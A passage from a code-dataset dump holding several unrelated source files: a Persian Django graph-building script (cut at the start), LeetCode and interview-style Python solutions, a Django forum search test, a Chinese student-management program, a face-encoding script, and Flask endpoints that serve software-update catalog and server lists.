list(labels_dict.keys())\n\n added_node = []\n nodes_data = []\n added_edge = []\n edges_data = []\n max_weight = 0\n for i in range(labels_list.__len__()):\n print(\"1.2.\", i/labels_list.__len__())\n label1 = labels_list[i]\n label1_id, label1_name = label1.split(\"_\")[0], label1.split(\"_\")[1]\n label1_doc_list = labels_dict[label1]\n for j in range(i+1, labels_list.__len__()):\n 
label2 = labels_list[j]\n label2_id, label2_name = label2.split(\"_\")[0], label2.split(\"_\")[1]\n label2_doc_list = labels_dict[label2]\n\n common_doc = list(set(label1_doc_list) & set(label2_doc_list))\n\n if common_doc.__len__() > 0:\n node1 = {\"id\": \"label_\" + label1_id, \"name\": label1_name, \"node_type\": \"label\", \"style\": {\"fill\": label_node_color}}\n node2 = {\"id\": \"label_\" + label2_id, \"name\": label2_name, \"node_type\": \"label\", \"style\": {\"fill\": label_node_color}}\n weight = common_doc.__len__()\n edge_id = str(label1_id) + \"_\" + str(label2_id)\n edge = {\"id\": edge_id, \"source\": \"label_\" + label1_id, \"source_name\": label1_name, \"source_type\": \"label\",\n \"target\": \"label_\" + label2_id, \"target_name\": label2_name, \"target_type\": \"label\", \"weight\": weight}\n\n if label1_id not in added_node:\n added_node.append(label1_id)\n nodes_data.append(node1)\n\n if label2_id not in added_node:\n added_node.append(label2_id)\n nodes_data.append(node2)\n\n\n if [label1_id, label2_id] not in added_edge and [label2_id, label1_id] not in added_edge:\n added_edge.append([label1_id, label2_id])\n edges_data.append(edge)\n\n\n if weight >= max_weight:\n max_weight = weight\n\n RahbariGraph.objects.create(type=graph_type, nodes_data=nodes_data, edges_data=edges_data)\n\n i = 1\n weight_list = []\n while i < max_weight:\n weight_list.append(str(i))\n\n if i < 5:\n i += 1\n else:\n i += 10\n\n\n histogram_list = []\n for w in weight_list:\n weight = int(w)\n histogram_count = list(filter(lambda x: x[\"weight\"] >= weight, edges_data)).__len__()\n histogram_list.append({\"key\": w, \"count\": histogram_count})\n\n graph_type.max_weight = max_weight\n graph_type.weight_list = \",\".join(weight_list)\n graph_type.save()\n graph_type.histogram_data = histogram_list\n graph_type.save()\n graph_type.histogram_title = \"توزیع باهم‌آیی برچسب‌ها براساس اسناد مشترک\"\n graph_type.save()\n graph_type.is_label = 1\n graph_type.save()\n\n\ndef DocumentLabelGraph():\n graph_name = \"گراف میان سند و برچسب\"\n graph_en_name = \"DocumentLabelGraph\"\n RahbariGraph.objects.filter(type__en_name=graph_en_name).delete()\n RahbariGraphType.objects.filter(en_name=graph_en_name).delete()\n\n graph_type = RahbariGraphType.objects.create(name=graph_name, en_name=graph_en_name)\n\n rahbari_document_list = Rahbari.objects.all()\n\n added_node = []\n nodes_data = []\n added_edge = []\n edges_data = []\n b = 0\n for doc in rahbari_document_list:\n print(\"2.\", b/rahbari_document_list.__len__())\n document_name = doc.document_name\n document_id = str(doc.document_id.id)\n document_shape = \"rect\"\n\n node1 = {\"id\": \"document_\" + document_id, \"name\": document_name, \"node_type\": \"document\", \"type\": document_shape, \"size\": 20,\n \"style\": {\"fill\": document_node_color}}\n nodes_data.append(node1)\n\n doc_labels = doc.labels.split(\"؛ \")\n for label in doc_labels:\n if len(label.replace(\" \", \"\")) > 0:\n label = label.replace('؛', '').replace(\"ائمه جمعه\", \"ائمه‌ جمعه\").replace(\"ورزش‌کاران\", \"ورزشکاران\")\n try:\n label_object = RahbariLabel.objects.get(name=label)\n label_name = label_object.name\n label_id = str(label_object.id)\n\n node2 = {\"id\": \"label_\" + label_id, \"name\": label_name, \"node_type\": \"label\", \"style\": {\"fill\": label_node_color}}\n\n if label_id not in added_node:\n added_node.append(label_id)\n nodes_data.append(node2)\n\n weight = 1\n edge_id = str(document_id) + \"_\" + str(label_id)\n edge = {\"id\": edge_id, \"source\": 
\"document_\" + document_id, \"source_name\": document_name, \"source_type\": \"document\",\n \"target\": \"label_\" + label_id, \"target_name\": label_name, \"target_type\": \"label\", \"weight\": weight}\n\n if [document_id, label_id] not in added_edge and [label_id, document_id] not in added_edge:\n added_edge.append([document_id, label_id])\n edges_data.append(edge)\n\n except:\n print(label)\n b += 1\n\n RahbariGraph.objects.create(type=graph_type, nodes_data=nodes_data, edges_data=edges_data)\n\n graph_type.max_weight = 1\n graph_type.weight_list = \"1\"\n graph_type.save()\n graph_type.histogram_data = [{\"key\": 1, \"count\": edges_data.__len__()}]\n graph_type.save()\n graph_type.histogram_title = \"توزیع میان اسناد و برچسب‌ها\"\n graph_type.save()\n graph_type.is_label = 1\n graph_type.save()\n graph_type.is_document = 1\n graph_type.save()\n\n\ndef DocumentDocumentGraph():\n graph_name = \"گراف برچسب‌های میان اسناد\"\n graph_en_name = \"DocumentDocumentGraph\"\n RahbariGraph.objects.filter(type__en_name=graph_en_name).delete()\n RahbariGraphType.objects.filter(en_name=graph_en_name).delete()\n\n graph_type = RahbariGraphType.objects.create(name=graph_name, en_name=graph_en_name)\n\n\n rahbari_labels = RahbariLabel.objects.all()\n rahbari_labels_name_dict = {}\n rahbari_labels_id_dict = {}\n\n for row in rahbari_labels:\n rahbari_labels_name_dict[row.name] = str(row.id)\n rahbari_labels_id_dict[str(row.id)] = row.name\n\n rahbari_document_list = Rahbari.objects.all()\n rahbari_document_labels = {}\n rahbari_document_names = {}\n for i in range(rahbari_document_list.__len__()):\n print(\"3.1\", i/rahbari_document_list.__len__())\n document_id = str(rahbari_document_list[i].document_id.id)\n document_name = str(rahbari_document_list[i].document_id.name)\n rahbari_document_names[document_id] = document_name\n doc1_labels = rahbari_document_list[i].labels.split(\"؛ \")\n doc1_labels_ids = []\n for lbl in doc1_labels:\n try:\n lbl = lbl.replace('؛', '').replace(\"ائمه جمعه\", \"ائمه‌ جمعه\").replace(\"ورزش‌کاران\", \"ورزشکاران\")\n lbl_id = rahbari_labels_name_dict[lbl]\n doc1_labels_ids.append(lbl_id)\n except Exception as e:\n pass\n\n rahbari_document_labels[document_id] = doc1_labels_ids\n\n\n nodes_data = []\n added_edge = []\n edges_data = []\n max_weight = 0\n\n\n doc_id_list = list(rahbari_document_labels.keys())\n\n for i in range(doc_id_list.__len__()):\n print(\"3.2\", i / doc_id_list.__len__())\n document1_id = doc_id_list[i]\n document1_name = rahbari_document_names[document1_id]\n document1_labels = rahbari_document_labels[document1_id]\n document1_shape = \"rect\"\n node1 = {\"id\": \"document_\" + document1_id, \"name\": document1_name, \"node_type\": \"document\", \"type\": document1_shape, \"size\": 20,\n \"style\": {\"fill\": document_node_color}}\n nodes_data.append(node1)\n\n for j in range(i+1, doc_id_list.__len__()):\n document2_id = doc_id_list[j]\n document2_name = rahbari_document_names[document2_id]\n document2_labels = rahbari_document_labels[document2_id]\n\n common_labels = list(set(document1_labels) & set(document2_labels))\n\n weight = common_labels.__len__()\n\n if weight > 0:\n edge_id = str(document1_id) + \"_\" + str(document2_id)\n edge = {\"id\": edge_id, \"source\": \"document_\" + document1_id, \"source_name\": document1_name, \"source_type\": \"document\",\n \"target\": \"document_\" + document2_id, \"target_name\": document2_name, \"target_type\": \"document\",\n \"weight\": weight}\n\n if [document1_id, document2_id] not in added_edge and 
[document2_id, document1_id] not in added_edge:\n added_edge.append([document1_id, document2_id])\n edges_data.append(edge)\n\n if weight >= max_weight:\n max_weight = weight\n\n RahbariGraph.objects.create(type=graph_type, nodes_data=nodes_data, edges_data=edges_data)\n\n step = 2\n weight_list = []\n histogram_list = []\n for i in range(1, max_weight, step):\n inc = i\n weight_list.append(str(inc))\n histogram_count = list(filter(lambda x: x[\"weight\"] >= inc, edges_data)).__len__()\n histogram_list.append({\"key\": inc, \"count\": histogram_count})\n\n graph_type.max_weight = max_weight\n graph_type.weight_list = \",\".join(weight_list)\n graph_type.save()\n graph_type.histogram_data = histogram_list\n graph_type.save()\n graph_type.histogram_title = \"توزیع اسناد براساس باهم‌آیی برچسب‌ها\"\n graph_type.save()\n graph_type.is_document = 1\n graph_type.save()\n","repo_name":"fatemeq/standard","sub_path":"scripts/Persian/RahabriGraph.py","file_name":"RahabriGraph.py","file_ext":"py","file_size_in_byte":11368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"17962500157","text":"# -*- coding: utf-8 -*-\n\"\"\"\n给定一个大小为 n 的数组,找到其中的众数。众数是指在数组中出现次数大于 ⌊ n/2 ⌋ 的元素。\n\n你可以假设数组是非空的,并且给定的数组总是存在众数。\n\n示例 1:\n\n输入: [3,2,3]\n输出: 3\n\n示例 2:\n\n输入: [2,2,1,1,1,2,2]\n输出: 2\n\n思路:排序找中位数 摩尔投票\n@author: xiaozuo\n\"\"\"\nclass Solution:\n def majorityElement(self, nums):\n return sorted(nums)[len(nums) // 2]\n\n\n # 摩尔投票法\n def mole(self, nums):\n tmp = nums[0]\n count = 1\n for i in range(1, len(nums)):\n if count == 0:\n tmp = nums[i]\n if nums[i]==tmp:\n count += 1\n else:\n count -= 1\n return tmp","repo_name":"xiaozuo7/algorithm_python","sub_path":"leetcode_求众数.py","file_name":"leetcode_求众数.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"73867148933","text":"from django.test import TestCase\n\nfrom simple_forums.backends.search import SearchResultSet\nfrom simple_forums.tests.testing_utils import create_thread\n\n\nclass TestSearchResultSet(TestCase):\n \"\"\" Test class used to return search results \"\"\"\n\n def test_add(self):\n \"\"\" Test adding a result to the result set.\n\n Adding a thread to the result set with it's score should save\n the thread in the result set.\n \"\"\"\n thread = create_thread()\n result_set = SearchResultSet()\n result_set.add(thread, 0)\n\n self.assertEqual((thread, 0), result_set[0])\n\n def test_add_default_score(self):\n \"\"\" Test adding a result to the result set with no score.\n\n Adding a thread to the result set and not specifying a score\n should set the result's score to 0.\n \"\"\"\n thread = create_thread()\n result_set = SearchResultSet()\n result_set.add(thread)\n\n self.assertEqual((thread, 0), result_set[0])\n\n def test_get_sorted(self):\n \"\"\" Test getting the sorted results.\n\n The results should be ordered by score, descending.\n \"\"\"\n result_set = SearchResultSet()\n result_set.results = [\n (None, 1),\n (None, 0),\n (None, 3),\n ]\n\n expected = [\n (None, 3),\n (None, 1),\n (None, 0),\n ]\n\n self.assertEqual(expected, result_set.get_sorted())\n","repo_name":"cdriehuys/django_simple_forums","sub_path":"simple_forums/tests/test_search_result_set.py","file_name":"test_search_result_set.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"44"} 
+{"seq_id":"22378484950","text":"#用来保存学生数据\nstu_infos = []\n\ndef print_menu():\n\t#1.打印功能提示\n\n\tprint(\"\\n\")\n\tprint(\"=\"*30)\n\tprint(\"\t学生管理系统v1.o\")\n\tprint(\"1. 添加学生信息\")\n\tprint(\"2. 删除学生信息\")\n\tprint(\"3. 修改学生信息\")\n\tprint(\"4. 查询学生信息\")\n\tprint(\"5. 显示所有学生信息\")\n\tprint(\"6. 保存数据\")\n\tprint(\"0. 退出系统\")\n\tprint(\"=\"*30)\n\tprint(\"\\n\")\n#1 添加学生信息\ndef add_stu_info():\n\n\t#1.1 提示并获取学生的姓名\n\tnew_name = input(\"请输入新学生的名字:\")\n\n\t#1.2 提示并获取学生的性别\n\tnew_sex = input(\"请输入新学生的性别:(男/女)\")\n\t\n\t#1.3 提示并获取学生的手机号\n\tnew_phone = input(\"请输入新学生的手机号码:\")\n\t\n\tnew_info = {}\n\tnew_info['name'] = new_name\n\tnew_info['sex'] = new_sex\n\tnew_info['phone'] = new_phone\n\n\tstu_infos.append(new_info)\n\t\n#2 删除指定的学生信息\ndef del_stu_info():\n\t#调用函数4实现查找功能\n\td_flag,d_i = search_stu_info()\n\tif d_flag==1:\n\t\ty_n = input(\"请确认是否删除以上信息y/n:\")\n\t\tif y_n==\"y\":\n\t\t\tdel stu_infos[d_i-1]\n\n#3 更改学生信息\ndef change_stu_info():\n\t#3.1 提示并获取需要修改的学生序号\n\tstu_ID =int(input(\"请输入要修改的学生的序号:\"))\n\n\t#3.2 重新输入学生的信息(姓名,性别,手机号码)\n\t#3.1.1 提示并获取学生的姓名\n\tnew_name = input(\"请输入新学生的名字:\")\n\n\t#3.1.2 提示并获取学生的性别\n\tnew_sex = input(\"请输入新学生的性别:(男/女)\")\n\t\n\t#3.1.3 提示并获取学生的手机号\n\tnew_phone = input(\"请输入新学生的手机号码:\")\n\t\n\tstu_infos[stu_ID-1]['name'] = new_name\n\tstu_infos[stu_ID-1]['sex'] = new_sex\n\tstu_infos[stu_ID-1]['phone'] = new_phone\n\n#4 查找学生信息\ndef search_stu_info():\n\tsearch_name = input(\"请输入要查询或删除的学生名字:\")\n\t#4.1 标志位清零\n\tflag = 0\n\tstu_ID=1\n\t#4.2 遍历所有stu_info\n\ti = 0\n\tfor temp_info in stu_infos:\n\t\t#4.3 查询成功,标志位置1,显示该生信息\n\t\tif temp_info['name']==search_name:\n\t\t\tflag = 1\n\t\t\tprint(\"=\"*30)\n\t\t\tprint(\"该生信息如下:\")\n\t\t\tprint(\"=\"*30)\n\t\t\tprint(\"序号\t姓名\t性别\t手机号码\")\n\t\t\tprint(\"%d\t%s\t%s\t%s\"%(stu_ID,temp_info['name'],temp_info['sex'],temp_info['phone']))\n\t\t\ti =int(stu_ID)\n\t\t\treturn flag,i\n\t\t#4.4 跳出循环之前,stu_ID+1\n\t\tstu_ID+=1\n\tif flag==0:\n\t\tprint(\"查无此人\")\n\t\treturn flag,i\n#5 显示所有学生信息\ndef print_stu_info():\n\tprint(\"=\"*30)\n\tprint(\"学生的信息如下:\")\n\tprint(\"=\"*30)\n\n\tprint(\"序号\t姓名\t性别\t手机号码\")\n\ti = 1\n\tfor temp_info in stu_infos:\n\t\tprint(\"%d\t%s\t%s\t%s\"%(i,temp_info['name'],temp_info['sex'],temp_info['phone']))\n\t\ti+=1\n\t\t\n#6 保存当前所有的学生信息到文件中\ndef save2file():\n\tf = open(\"backup.data\",\"w\")\n\ttemp = str(stu_infos) \n\tf.write(temp)\t\n\t\n\tf.close()\n\tprint(\"数据已保存\")\n\n#恢复数据函数\ndef backup_data():\n\tglobal stu_infos\n\tf = open(\"backup.data\")\n\tcontent = f.read()\n\ttemp = eval(content)\n\tstu_infos = temp\n\tf.close()\n\n#\tprint(stu_infos)\n#\ta = str(type(stu_infos))\n#\tprint(a)\n\ndef main():\n\t#设置flag,标识退出时数据是否需要保存\n\tf_save_file = True\n\t#恢复上次的数据\n\tbackup_data()\n\twhile True:\n\t\t#设置flag,标识退出时数据是否需要保存\n\t\tf_save_file = True\n\t\t#1.打印功能提示\n\t\tprint_menu()\n\n\t\t#获取功能的选择\n\t\tkey = input(\"请输入功能对应的数字: \")\n\t\tprint(\"\\n\")\n\t\t#根据用户的选择,进行相应的操作\n\t\t\n\t\tif key==\"1\":\n\t\t\t#1 添加学生信息\n\t\t\tadd_stu_info()\n\t\telif key=='2':\n\t\t\t#2 删除学生信息\n\t\t\tdel_stu_info()\n\t\telif key=='3':\n\t\t\t#3 修改学生的信息\n\t\t\tchange_stu_info()\n\t\telif key=='4':\n\t\t\t#4 查询学生信息\n\t\t\tsearch_stu_info()\n\t\telif key=='5':\n\t\t\t#5 print(stu_infos)\n\t\t\tprint_stu_info()\t\n\t\telif key=='6':\n\t\t\t#6 保存数据到文件中\n\t\t\tf_save_file = False\n\t\t\tsave2file()\n\t\t\t#print(\"数据已保存\")\n\t\telif key=='0':\n\t\t\tbreak\n\tif 
f_save_file:\n\t\tsave2file()\nmain()\n","repo_name":"A201124253/Hello-world","sub_path":"05-文件操作/10-学生管理系统-文件版.py","file_name":"10-学生管理系统-文件版.py","file_ext":"py","file_size_in_byte":3958,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"17962699217","text":"#!/usr/local/anaconda3/bin/python3\n# -*- coding: utf-8 -*-\n\"\"\"\n输入一个整数数组,实现一个函数来调整��数组中数字的顺序,使得所有的奇数位于数组的前半部分,\n所有的偶数位于数组的后半部分,并保证奇数和奇数,偶数和偶数之间的相对位置不变。\n\n\n思路一: 空间换时间 建两个数组对号入座\n思路二: 冒泡排序思想,设立Flag判断什么时候交换\n@author: xiaozuo\n\"\"\"\n# class Solution:\n# def reOrderArray(self, array):\n# # write code here\n# n = len(array)\n# res = []\n# tmp = []\n# for i in array[:]:\n# if i % 2 == 0:\n# res.append(i)\n# else:\n# tmp.append(i)\n# return tmp+res\n\n\nclass Solution:\n def reOrderArray(self, array):\n for i in range(len(array)):\n flag = False\n for j in range(len(array) - 1, i, -1):\n\n if array[j] % 2 == 1 and array[j - 1] % 2 == 0:\n array[j], array[j-1] = array[j-1], array[j]\n flag = True\n if flag == False:\n break\n return array\n\nif __name__ == '__main__':\n sol = Solution()\n array = [1,2,3,4,5,6]\n print(sol.reOrderArray(array=array))","repo_name":"xiaozuo7/algorithm_python","sub_path":"offer/reOrderArray.py","file_name":"reOrderArray.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"71282501572","text":"# -*- coding: utf-8 -*-\nimport os\nimport pickle\nimport posixpath\nimport re\n\nimport numpy as np\n\nimport Faces\n\nFACES_FOLDER = \"./stdface/\"\nNUM_JITTERS = 1 # 获取图像编码时抖动次数\n\n\ndef image_files_in_folder(folder):\n # 统一使用unix的/分隔符\n return [posixpath.join(folder, f_) for f_ in os.listdir(folder) if re.match(r'.*\\.(jpg|jpeg|png)', f_, flags=re.I)]\n\n\nid_list = []\nface_encodings = []\n\nprint(\"---开始读取文件---\")\nfor directory in os.listdir(FACES_FOLDER):\n print(\"[ ]开始处理文件夹{}\".format(directory))\n directory_path = posixpath.join(FACES_FOLDER, directory)\n\n for file in image_files_in_folder(directory_path):\n basename = os.path.splitext(os.path.basename(file))[0]\n print(\"[ ]正在处理图片{}\".format(file.split('/')[-1]))\n image = Faces.load_image_file(file)\n top, right, bottom, left = 0, 255, 255, 0\n # top, right, bottom, left = Faces.get_only_face(image, min_face_area=1000, upsample=2)\n # print(\"[+]人脸位置\", (top, right, bottom, left))\n \n encoding = Faces.face_encodings(image, [(top, right, bottom, left)], NUM_JITTERS)\n id_list.append(int(directory))\n face_encodings.append(encoding)\n\n \n# 对face_encodings做整形处理 整理成(n, 128)的形式\nlength = len(id_list)\nnp_face_encodings = np.asarray(face_encodings)\nnp_face_encodings = np_face_encodings.reshape(length, -1)\n\n# 结果以pickle的形式保存到本地\nprint(\"[+]检测结束,开始保存结果\")\nwith open(\"./data/id_list.data\", \"wb\") as f:\n pickle.dump(id_list, f)\n\nwith open(\"./data/face_encodings.data\", \"wb\") as f:\n pickle.dump(np_face_encodings, f)\nprint(\"[+]保存成功\")\n","repo_name":"iszhyang/face_recognition","sub_path":"Faces/get_encodings.py","file_name":"get_encodings.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"44"} +{"seq_id":"42297036404","text":"from flask import request\nfrom flask_restful import reqparse\nfrom sqlalchemy.exc import IntegrityError\n\nfrom . import *\nfrom .. import db\nfrom .. mputil import *\nfrom .. model import *\nfrom .. 
mplogger import *\n\nparser = reqparse.RequestParser()\n\nclass SUSCatalogs(MPResource):\n\tdef __init__(self):\n\t\tself.reqparse = reqparse.RequestParser()\n\t\tsuper(SUSCatalogs, self).__init__()\n\n\tdef get(self, cuuid, osminor, osmajor=\"10\"):\n\n\t\ttry:\n\t\t\tif not isValidClientID(cuuid):\n\t\t\t\tlog_Error('[SUSCatalogs][Get]: Failed to verify ClientID (%s)' % (cuuid))\n\t\t\t\treturn {\"result\": '', \"errorno\": 424, \"errormsg\": 'Failed to verify ClientID'}, 424\n\n\t\t\tif not isValidSignature(self.req_signature, cuuid, self.req_uri, self.req_ts):\n\t\t\t\tif current_app.config['ALLOW_MIXED_SIGNATURES']:\n\t\t\t\t\tlog_Info('[SUSCatalogs][Get]: ALLOW_MIXED_SIGNATURES is enabled.')\n\t\t\t\telse:\n\t\t\t\t\tlog_Error('[SUSCatalogs][Get]: Failed to verify Signature for client (%s)' % (cuuid))\n\t\t\t\t\treturn {\"result\": '', \"errorno\": 424, \"errormsg\": 'Failed to verify Signature'}, 424\n\n\t\t\tq_catalogs = MpAsusCatalog.query.filter(MpAsusCatalog.os_major == int(osmajor),\n\t\t\t\t\t\t\t\t\t\t\t\t\tMpAsusCatalog.os_minor == int(osminor)).order_by(MpAsusCatalog.c_order.asc()).all()\n\n\t\t\t# CatalogURLS\n\t\t\t# ProxyCatalogURLS\n\t\t\t_errorno = 500\n\t\t\t_result = 404\n\t\t\tcatalogs = {}\n\t\t\tcats = []\n\t\t\tproxy_cats = []\n\n\t\t\tif catalogs is not None:\n\t\t\t\tif len(q_catalogs) >= 1:\n\t\t\t\t\tfor row in q_catalogs:\n\t\t\t\t\t\tif row.proxy == 0:\n\t\t\t\t\t\t\tcats.append(row.catalog_url)\n\t\t\t\t\t\telif row.proxy == 1:\n\t\t\t\t\t\t\tproxy_cats.append(row.catalog_url)\n\n\t\t\t\t\tcatalogs['CatalogURLS'] = cats\n\t\t\t\t\tcatalogs['ProxyCatalogURLS'] = proxy_cats\n\t\t\t\t\t_errorno = 0\n\t\t\t\t\t_result = 200\n\t\t\t\telse:\n\t\t\t\t\tlog_Error('[SUSCatalogs][Get][%s]: Error no sus catalogs found.' % (cuuid))\n\t\t\t\t\t_errorno = 404\n\t\t\telse:\n\t\t\t\tlog_Error('[SUSCatalogs][Get][%s]: Error no catalogs found.' 
% (cuuid))\n\n\t\t\treturn {'errorno': _errorno, 'errormsg': '', 'result': catalogs}, _result\n\n\t\texcept Exception as e:\n\t\t\texc_type, exc_obj, exc_tb = sys.exc_info()\n\t\t\tmessage=str(e.args[0]).encode(\"utf-8\")\n\t\t\tlog_Error('[SUSCatalogs][Get][Exception][Line: {}] CUUID: {} Message: {}'.format(exc_tb.tb_lineno, cuuid, message))\n\t\t\treturn {'errorno': 500, 'errormsg': message, 'result': {}}, 500\n\nclass SUServerList(MPResource):\n\tdef __init__(self):\n\t\tself.reqparse = reqparse.RequestParser()\n\t\tsuper(SUServerList, self).__init__()\n\n\tdef get(self, cuuid, osminor, osmajor=\"10\"):\n\n\t\ttry:\n\t\t\tif not isValidClientID(cuuid):\n\t\t\t\tlog_Error('[SUServerList][Get]: Failed to verify ClientID (%s)' % (cuuid))\n\t\t\t\treturn {\"result\": '', \"errorno\": 424, \"errormsg\": 'Failed to verify ClientID'}, 424\n\n\t\t\tif not isValidSignature(self.req_signature, cuuid, self.req_uri, self.req_ts):\n\t\t\t\tif current_app.config['ALLOW_MIXED_SIGNATURES']:\n\t\t\t\t\tlog_Info('[SUServerList][Get]: ALLOW_MIXED_SIGNATURES is enabled.')\n\t\t\t\telse:\n\t\t\t\t\tlog_Error('[SUServerList][Get]: Failed to verify Signature for client (%s)' % (cuuid))\n\t\t\t\t\treturn {\"result\": '', \"errorno\": 424, \"errormsg\": 'Failed to verify Signature'}, 424\n\n\t\t\t_osver = '{}.{}'.format(osmajor, osminor)\n\t\t\t_serverObj = ServerInfo()\n\t\t\t_serverObj = suServerListForID(1,_osver)\n\n\t\t\tlog_Debug('[SUServerList][Get] CUUID: %s Result: %s' % (cuuid, _serverObj.struct()))\n\t\t\treturn {'errorno': 0, 'errormsg': '', 'result': _serverObj.struct()}, 200\n\n\t\texcept Exception as e:\n\t\t\texc_type, exc_obj, exc_tb = sys.exc_info()\n\t\t\tmessage=str(e.args[0]).encode(\"utf-8\")\n\t\t\tlog_Error('[SUServerList][Get][Exception][Line: {}] CUUID: {} Message: {}'.format(exc_tb.tb_lineno, cuuid, message))\n\t\t\treturn {'errorno': 500, 'errormsg': message, 'result': {}}, 500\n\nclass SUSListVersion(MPResource):\n\tdef __init__(self):\n\t\tself.reqparse = reqparse.RequestParser()\n\t\tsuper(SUSListVersion, self).__init__()\n\n\tdef get(self, cuuid=None, list_id=1):\n\n\t\ttry:\n\t\t\tif not isValidClientID(cuuid):\n\t\t\t\tlog_Error('[SUSListVersion][Get]: Failed to verify ClientID (%s)' % (cuuid))\n\t\t\t\treturn {\"result\": '', \"errorno\": 424, \"errormsg\": 'Failed to verify ClientID'}, 424\n\n\t\t\tif not isValidSignature(self.req_signature, cuuid, self.req_uri, self.req_ts):\n\t\t\t\tif current_app.config['ALLOW_MIXED_SIGNATURES']:\n\t\t\t\t\tlog_Info('[SUSListVersion][Get]: ALLOW_MIXED_SIGNATURES is enabled.')\n\t\t\t\telse:\n\t\t\t\t\tlog_Error('[SUSListVersion][Get]: Failed to verify Signature for client (%s)' % (cuuid))\n\t\t\t\t\treturn {\"result\": '', \"errorno\": 424, \"errormsg\": 'Failed to verify Signature'}, 424\n\n\t\t\t_result = 404\n\t\t\t_server = {\"version\": 0, \"listid\": 0}\n\n\t\t\tlog_Debug(\"[SUSListVersion][Get][%s]: Getting SUS Catalog list using id (%s)\" % (cuuid, list_id))\n\t\t\tq_result = MpAsusCatalogList.query.filter(MpAsusCatalogList.listid == list_id).first()\n\t\t\tif q_result is not None:\n\t\t\t\t_server['version'] = q_result.version\n\t\t\t\t_server['listid'] = q_result.listid\n\t\t\t\t_result = 200\n\t\t\telse:\n\t\t\t\tlog_Warn('[SUSListVersion][Get][%s]: No list found for list id (%s)' % (cuuid, list_id))\n\n\t\t\treturn {'errorno': '0', 'errormsg': '', 'result': _server}, _result\n\n\t\texcept Exception as e:\n\t\t\texc_type, exc_obj, exc_tb = 
sys.exc_info()\n\t\t\tmessage=str(e.args[0]).encode(\"utf-8\")\n\t\t\tlog_Error('[SUSListVersion][Get][Exception][Line: {}] CUUID: {} Message: {}'.format(exc_tb.tb_lineno, cuuid, message))\n\t\t\treturn {'errorno': 500, 'errormsg': message, 'result': {}}, 500\n\nclass ServerList(MPResource):\n\tdef __init__(self):\n\t\tself.reqparse = reqparse.RequestParser()\n\t\tsuper(ServerList, self).__init__()\n\n\tdef get(self, cuuid, list_id=1):\n\n\t\ttry:\n\t\t\tif not isValidClientID(cuuid):\n\t\t\t\tlog_Error('[ServerList][Get]: Failed to verify ClientID (%s)' % (cuuid))\n\t\t\t\treturn {\"result\": '', \"errorno\": 424, \"errormsg\": 'Failed to verify ClientID'}, 424\n\n\t\t\tif not isValidSignature(self.req_signature, cuuid, self.req_uri, self.req_ts):\n\t\t\t\tif current_app.config['ALLOW_MIXED_SIGNATURES']:\n\t\t\t\t\tlog_Info('[ServerList][Get]: ALLOW_MIXED_SIGNATURES is enabled.')\n\t\t\t\telse:\n\t\t\t\t\tlog_Error('[ServerList][Get]: Failed to verify Signature for client (%s)' % (cuuid))\n\t\t\t\t\treturn {\"result\": '', \"errorno\": 424, \"errormsg\": 'Failed to verify Signature'}, 424\n\n\t\t\t_serverObj = serverListForID(list_id)\n\n\t\t\tif _serverObj is not None:\n\t\t\t\treturn {'errorno': '0', 'errormsg': '', 'result': _serverObj.struct()}, 200\n\n\t\t\t# No Result\n\t\t\tlog_Error('[ServerList][Get][%s]: Server List Not Found for id (%d)' % (cuuid, list_id))\n\t\t\treturn {'errorno': 404, 'errormsg': 'Server List Not Found', 'result': {}}, 404\n\n\t\texcept Exception as e:\n\t\t\texc_type, exc_obj, exc_tb = sys.exc_info()\n\t\t\tmessage=str(e.args[0]).encode(\"utf-8\")\n\t\t\tlog_Error('[ServerList][Get][Exception][Line: {}] CUUID: {} Message: {}'.format(exc_tb.tb_lineno, cuuid, message))\n\t\t\treturn {'errorno': 500, 'errormsg': message, 'result': {}}, 500\n\nclass ServerListVersion(MPResource):\n\tdef __init__(self):\n\t\tself.reqparse = reqparse.RequestParser()\n\t\tsuper(ServerListVersion, self).__init__()\n\n\tdef get(self, cuuid=None, list_id=1):\n\n\t\ttry:\n\t\t\tif not isValidClientID(cuuid):\n\t\t\t\tlog_Error('[ServerListVersion][Get]: Failed to verify ClientID (%s)' % (cuuid))\n\t\t\t\treturn {\"result\": '', \"errorno\": 424, \"errormsg\": 'Failed to verify ClientID'}, 424\n\n\t\t\tif not isValidSignature(self.req_signature, cuuid, self.req_uri, self.req_ts):\n\t\t\t\tif current_app.config['ALLOW_MIXED_SIGNATURES']:\n\t\t\t\t\tlog_Info('[ServerListVersion][Get]: ALLOW_MIXED_SIGNATURES is enabled.')\n\t\t\t\telse:\n\t\t\t\t\tlog_Error('[ServerListVersion][Get]: Failed to verify Signature for client (%s)' % (cuuid))\n\t\t\t\t\treturn {\"result\": '', \"errorno\": 424, \"errormsg\": 'Failed to verify Signature'}, 424\n\n\t\t\t_result = 404\n\t\t\t_server = {\"version\": 0, \"listid\": 0}\n\n\t\t\tq_result = MpServerList.query.filter(MpServerList.listid == list_id).first()\n\t\t\tif q_result is not None:\n\t\t\t\t_server['version'] = q_result.version\n\t\t\t\t_server['listid'] = q_result.listid\n\t\t\t\t_result = 200\n\t\t\telse:\n\t\t\t\tlog_Warn('[ServerListVersion][Get][%s]: No list found for list id (%d)' % (cuuid, list_id))\n\n\t\t\treturn {'errorno': '0', 'errormsg': '', 'result': _server}, _result\n\n\t\texcept Exception as e:\n\t\t\texc_type, exc_obj, exc_tb = sys.exc_info()\n\t\t\tmessage=str(e.args[0]).encode(\"utf-8\")\n\t\t\tlog_Error('[ServerListVersion][Get][Exception][Line: {}] CUUID: {} Message: {}'.format(exc_tb.tb_lineno, cuuid, message))\n\t\t\treturn {'errorno': 500, 'errormsg': message, 'result': {}}, 500\n\n''' ------------------------------- 
